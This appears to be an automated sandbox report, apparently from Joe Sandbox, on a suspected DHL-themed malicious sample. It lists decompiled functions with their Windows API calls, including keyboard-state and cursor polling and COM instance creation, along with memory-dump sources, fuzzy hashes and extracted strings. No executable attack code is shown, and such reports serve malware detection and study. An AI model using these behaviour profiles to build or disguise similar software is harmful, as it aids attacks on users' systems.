                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _memcmp
                                                                                      • String ID:
                                                                                      • API String ID: 2931989736-0
                                                                                      • Opcode ID: e9d4afcc44cc0021113652c9cefecb544a6917023baafd9a37af74f79718c949
                                                                                      • Instruction ID: 924f3217c1dc2e5c39c876940cb786f9965c0aaf6e2e799cac65a44bee8629a9
                                                                                      • Opcode Fuzzy Hash: e9d4afcc44cc0021113652c9cefecb544a6917023baafd9a37af74f79718c949
                                                                                      • Instruction Fuzzy Hash: 6B219871745905779A155A229ED2FFF639DAF10386F440024FE045B582F760EE1493A5
                                                                                      Function 000B4FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                                                      • API String ID: 0-572801152
                                                                                      • Opcode ID: e27cd5a57b57f09c54d970b904347c9359d482c54e5fee8c64518777675bf421
                                                                                      • Instruction ID: 2db25afc90c3f60bb9cc537bdf6825db09155876c17b0f624c94147a39f7580a
                                                                                      • Opcode Fuzzy Hash: e27cd5a57b57f09c54d970b904347c9359d482c54e5fee8c64518777675bf421
                                                                                      • Instruction Fuzzy Hash: 80D18C71A0060AAFDF14DFA8CC81BEEB7F5BF48345F1484A9E915AB281E7719D41CB90
                                                                                      Function 00071522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,000717FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 000715CE
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,000717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00071651
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,000717FB,?,000717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 000716E4
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,000717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 000716FB
                                                                                        • Part of subcall function 00063820: RtlAllocateHeap.NTDLL(00000000,?,00101444,?,0004FDF5,?,?,0003A976,00000010,00101440,000313FC,?,000313C6,?,00031129), ref: 00063852
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,000717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00071777
                                                                                      • __freea.LIBCMT ref: 000717A2
                                                                                      • __freea.LIBCMT ref: 000717AE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                      • String ID:
                                                                                      • API String ID: 2829977744-0
                                                                                      • Opcode ID: 82690222fc0aa2b550de9497f26db559ace917e1d4bfc2fb777a03748eee0560
                                                                                      • Instruction ID: 4e1ea8a692c995e5be16e272dfa43275bd88d54a3ba74ba77d0f0a28a4f99ba4
                                                                                      • Opcode Fuzzy Hash: 82690222fc0aa2b550de9497f26db559ace917e1d4bfc2fb777a03748eee0560
                                                                                      • Instruction Fuzzy Hash: B491A371E046169ADB288E6CC881EEE7BF5AF49710F18C659E809E71C1DB39DD40CBA4
                                                                                      Function 000B4523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Variant$ClearInit
                                                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                      • API String ID: 2610073882-625585964
                                                                                      • Opcode ID: 7a1ca39c84668818c5c6b05d9b7be7c5404e375e2002ec3a627568a8b4c6fbe6
                                                                                      • Instruction ID: 9393ffabe03e67d0706163179a066173ddddc9f9aaeb9736c5c99e57a4ceffa2
                                                                                      • Opcode Fuzzy Hash: 7a1ca39c84668818c5c6b05d9b7be7c5404e375e2002ec3a627568a8b4c6fbe6
                                                                                      • Instruction Fuzzy Hash: A1919471A04219AFDF24CFA5C884FEE7BB8EF46710F108559F505AB282DB709A45CFA1
                                                                                      Function 000A1187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 000A125C
                                                                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 000A1284
                                                                                      • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 000A12A8
                                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 000A12D8
                                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 000A135F
                                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 000A13C4
                                                                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 000A1430
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                      • String ID:
                                                                                      • API String ID: 2550207440-0
                                                                                      • Opcode ID: fa4c41582ee9efb2b57758fe15c8449ca464e8ec1a079ed455866f97c9c01d21
                                                                                      • Instruction ID: b45fcc2084245c86d6434f415e2ee6a4e3b1dfee7c9451190e988fbf42f2c2b8
                                                                                      • Opcode Fuzzy Hash: fa4c41582ee9efb2b57758fe15c8449ca464e8ec1a079ed455866f97c9c01d21
                                                                                      • Instruction Fuzzy Hash: 9591AF75A00209AFEB119FD8C885BFEB7B9FF46315F108029E941EB292D775E941CB90
                                                                                      Function 0004948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                                      • String ID:
                                                                                      • API String ID: 3225163088-0
                                                                                      • Opcode ID: 145de2c4549b6239a485dd11fd3f3cebf4287acd1a500687f9ba4bbbe260f3b6
                                                                                      • Instruction ID: 2bde1e01ad6c2e4fc892538105805a79cd3714bb8a54ca48eb2ce312759265c6
                                                                                      • Opcode Fuzzy Hash: 145de2c4549b6239a485dd11fd3f3cebf4287acd1a500687f9ba4bbbe260f3b6
                                                                                      • Instruction Fuzzy Hash: 369139B1D00219EFCB50CFA9CC84AEEBBB8FF49320F244569E515B7251D378AA41CB64
                                                                                      Function 000B3947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • VariantInit.OLEAUT32(?), ref: 000B396B
                                                                                      • CharUpperBuffW.USER32(?,?), ref: 000B3A7A
                                                                                      • _wcslen.LIBCMT ref: 000B3A8A
                                                                                      • VariantClear.OLEAUT32(?), ref: 000B3C1F
                                                                                        • Part of subcall function 000A0CDF: VariantInit.OLEAUT32(00000000), ref: 000A0D1F
                                                                                        • Part of subcall function 000A0CDF: VariantCopy.OLEAUT32(?,?), ref: 000A0D28
                                                                                        • Part of subcall function 000A0CDF: VariantClear.OLEAUT32(?), ref: 000A0D34
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                      • API String ID: 4137639002-1221869570
                                                                                      • Opcode ID: 8ce9322c5634d2de6e4e53a2489506158fa12505b476423efac388d6a00fe1cf
                                                                                      • Instruction ID: bfcfdcf2e9bd5f64f106a69a1bf6979de6af63be0d97887fe9dc495f295b8e7d
                                                                                      • Opcode Fuzzy Hash: 8ce9322c5634d2de6e4e53a2489506158fa12505b476423efac388d6a00fe1cf
                                                                                      • Instruction Fuzzy Hash: FA917A756083059FCB14DF28C4809AAB7E4FF89314F24892DF9899B352DB31EE05CB92
                                                                                      Function 000B4BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0009000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0008FF41,80070057,?,?,?,0009035E), ref: 0009002B
                                                                                        • Part of subcall function 0009000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0008FF41,80070057,?,?), ref: 00090046
                                                                                        • Part of subcall function 0009000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0008FF41,80070057,?,?), ref: 00090054
                                                                                        • Part of subcall function 0009000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0008FF41,80070057,?), ref: 00090064
                                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 000B4C51
                                                                                      • _wcslen.LIBCMT ref: 000B4D59
                                                                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 000B4DCF
                                                                                      • CoTaskMemFree.OLE32(?), ref: 000B4DDA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                      • String ID: NULL Pointer assignment
                                                                                      • API String ID: 614568839-2785691316
                                                                                      • Opcode ID: 2bcf6baee4b2c58d648ead20f2068889aac64a7aaf28c5e8d9c87f943adeb85d
                                                                                      • Instruction ID: 4cd38c0c8ed095859b41ef12860eb408c74b2d809695baaafad255ebe0fe0ffa
                                                                                      • Opcode Fuzzy Hash: 2bcf6baee4b2c58d648ead20f2068889aac64a7aaf28c5e8d9c87f943adeb85d
                                                                                      • Instruction Fuzzy Hash: E5910571D00219AFDF15DFA4C891EEEB7B9BF48310F10816AE919A7252DB749A44CFA0
                                                                                      Function 000C20FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetMenu.USER32(?), ref: 000C2183
                                                                                      • GetMenuItemCount.USER32(00000000), ref: 000C21B5
                                                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 000C21DD
                                                                                      • _wcslen.LIBCMT ref: 000C2213
                                                                                      • GetMenuItemID.USER32(?,?), ref: 000C224D
                                                                                      • GetSubMenu.USER32(?,?), ref: 000C225B
                                                                                        • Part of subcall function 00093A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00093A57
                                                                                        • Part of subcall function 00093A3D: GetCurrentThreadId.KERNEL32 ref: 00093A5E
                                                                                        • Part of subcall function 00093A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,000925B3), ref: 00093A65
                                                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 000C22E3
                                                                                        • Part of subcall function 0009E97B: Sleep.KERNEL32 ref: 0009E9F3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                      • String ID:
                                                                                      • API String ID: 4196846111-0
                                                                                      • Opcode ID: bae15c52b79b5584fbeebaf174f4e8fa6430123ec1c014d4ad981112bcfac7e2
                                                                                      • Instruction ID: 6acb90261540b76171d7643eb411b54bd7f652f45886609ec08061fcbae07421
                                                                                      • Opcode Fuzzy Hash: bae15c52b79b5584fbeebaf174f4e8fa6430123ec1c014d4ad981112bcfac7e2
                                                                                      • Instruction Fuzzy Hash: 84716C75A00205AFDB15EFA4C845FAEB7F5EF48310F14846DE81AEB752DB34AE418B90
                                                                                      Function 0009AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetParent.USER32(?), ref: 0009AEF9
                                                                                      • GetKeyboardState.USER32(?), ref: 0009AF0E
                                                                                      • SetKeyboardState.USER32(?), ref: 0009AF6F
                                                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 0009AF9D
                                                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 0009AFBC
                                                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 0009AFFD
                                                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0009B020
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                      • String ID:
                                                                                      • API String ID: 87235514-0
                                                                                      • Opcode ID: 70d12ae81cba0e39a921ef8510c574cac90c996b6a8658599eb102a05ec356fc
                                                                                      • Instruction ID: 0e13629705a38a930f69e8bbc1b842666b13620a744b83b577f27c1db84b0108
                                                                                      • Opcode Fuzzy Hash: 70d12ae81cba0e39a921ef8510c574cac90c996b6a8658599eb102a05ec356fc
                                                                                      • Instruction Fuzzy Hash: A951DFA0A047D53DFF368374CD59BBABEE95B06314F088499E1E9458C3C398A8C8E791
                                                                                      Function 0009ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetParent.USER32(00000000), ref: 0009AD19
                                                                                      • GetKeyboardState.USER32(?), ref: 0009AD2E
                                                                                      • SetKeyboardState.USER32(?), ref: 0009AD8F
                                                                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0009ADBB
                                                                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0009ADD8
                                                                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0009AE17
                                                                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0009AE38
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                      • String ID:
                                                                                      • API String ID: 87235514-0
                                                                                      • Opcode ID: 4f6cf34f0c11ff043fb7a3eb65db32e97cf1547919b5c3012f9d66d7785e4f5a
                                                                                      • Instruction ID: 9a8ce4a993447c4808671d049b3f6fc21ebdc6990d0999d53c26849d815cf942
                                                                                      • Opcode Fuzzy Hash: 4f6cf34f0c11ff043fb7a3eb65db32e97cf1547919b5c3012f9d66d7785e4f5a
                                                                                      • Instruction Fuzzy Hash: A551B6A1A057D53DFF3683348C55BBA7ED95B47300F088589E1D6468C3D694EC84F7A2
                                                                                      Function 0006542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetConsoleCP.KERNEL32(00073CD6,?,?,?,?,?,?,?,?,00065BA3,?,?,00073CD6,?,?), ref: 00065470
                                                                                      • __fassign.LIBCMT ref: 000654EB
                                                                                      • __fassign.LIBCMT ref: 00065506
                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00073CD6,00000005,00000000,00000000), ref: 0006552C
                                                                                      • WriteFile.KERNEL32(?,00073CD6,00000000,00065BA3,00000000,?,?,?,?,?,?,?,?,?,00065BA3,?), ref: 0006554B
                                                                                      • WriteFile.KERNEL32(?,?,00000001,00065BA3,00000000,?,?,?,?,?,?,?,?,?,00065BA3,?), ref: 00065584
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                      • String ID:
                                                                                      • API String ID: 1324828854-0
                                                                                      • Opcode ID: 0e0e73682c3d7277856a4cd84a869dba7bdc2b47f3cb60f646c84791b567f5ec
                                                                                      • Instruction ID: 903f0b1c0a15e235267dc5133c67e7fa48868f69db26e08795fce502499da723
                                                                                      • Opcode Fuzzy Hash: 0e0e73682c3d7277856a4cd84a869dba7bdc2b47f3cb60f646c84791b567f5ec
                                                                                      • Instruction Fuzzy Hash: 7151B170A007499FDB11CFA8DC59AEEBBFAEF09301F14415AF956E7291D6309A41CB60
                                                                                      Function 000C6B76 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 131windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetWindowLongW.USER32(00000002,000000F0,?), ref: 000C6C33
                                                                                      • SetWindowLongW.USER32(?,000000EC,?), ref: 000C6C4A
                                                                                      • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 000C6C73
                                                                                      • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,000AAB79,00000000,00000000), ref: 000C6C98
                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 000C6CC7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Long$MessageSendShow
                                                                                      • String ID: p]
                                                                                      • API String ID: 3688381893-1923361398
                                                                                      • Opcode ID: 2f616260564b1691130adde79e24eb1192074ffcfb0b3362d39e6aa08be2cc35
                                                                                      • Instruction ID: c3c5ff4a7c6dab513f0d076fdea1f27a5529048c23246c3e689f2f67d8e17045
                                                                                      • Opcode Fuzzy Hash: 2f616260564b1691130adde79e24eb1192074ffcfb0b3362d39e6aa08be2cc35
                                                                                      • Instruction Fuzzy Hash: A741AF35A04104AFEB34CF68CD99FBD7BE5EB09350F14022CF899A72A1C372AD41DA80
                                                                                      Function 0004912D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 121keyboardCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCursorPos.USER32(?), ref: 00049141
                                                                                      • ScreenToClient.USER32(00000000,?), ref: 0004915E
                                                                                      • GetAsyncKeyState.USER32(00000001), ref: 00049183
                                                                                      • GetAsyncKeyState.USER32(00000002), ref: 0004919D
                                                                                      Strings
                                                                                      • e8f1bc446112c9a4d8f0b4eb569591a0e023dd312824c1c97905eeb71e59803534dfd5c8e832f189001d93511e18da357505614a13b301b84e3e580495d5bec564, xrefs: 00087152
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: AsyncState$ClientCursorScreen
                                                                                      • String ID: e8f1bc446112c9a4d8f0b4eb569591a0e023dd312824c1c97905eeb71e59803534dfd5c8e832f189001d93511e18da357505614a13b301b84e3e580495d5bec564
                                                                                      • API String ID: 4210589936-1144659281
                                                                                      • Opcode ID: aa681181faeccf4c4b398145dbf7014e50549dcaa670c1d9fd50f225015a9c76
                                                                                      • Instruction ID: 2a0de4980b91f9966b95d07a71defdbbc539fa17d2fc65c4383eabb26749ffd4
                                                                                      • Opcode Fuzzy Hash: aa681181faeccf4c4b398145dbf7014e50549dcaa670c1d9fd50f225015a9c76
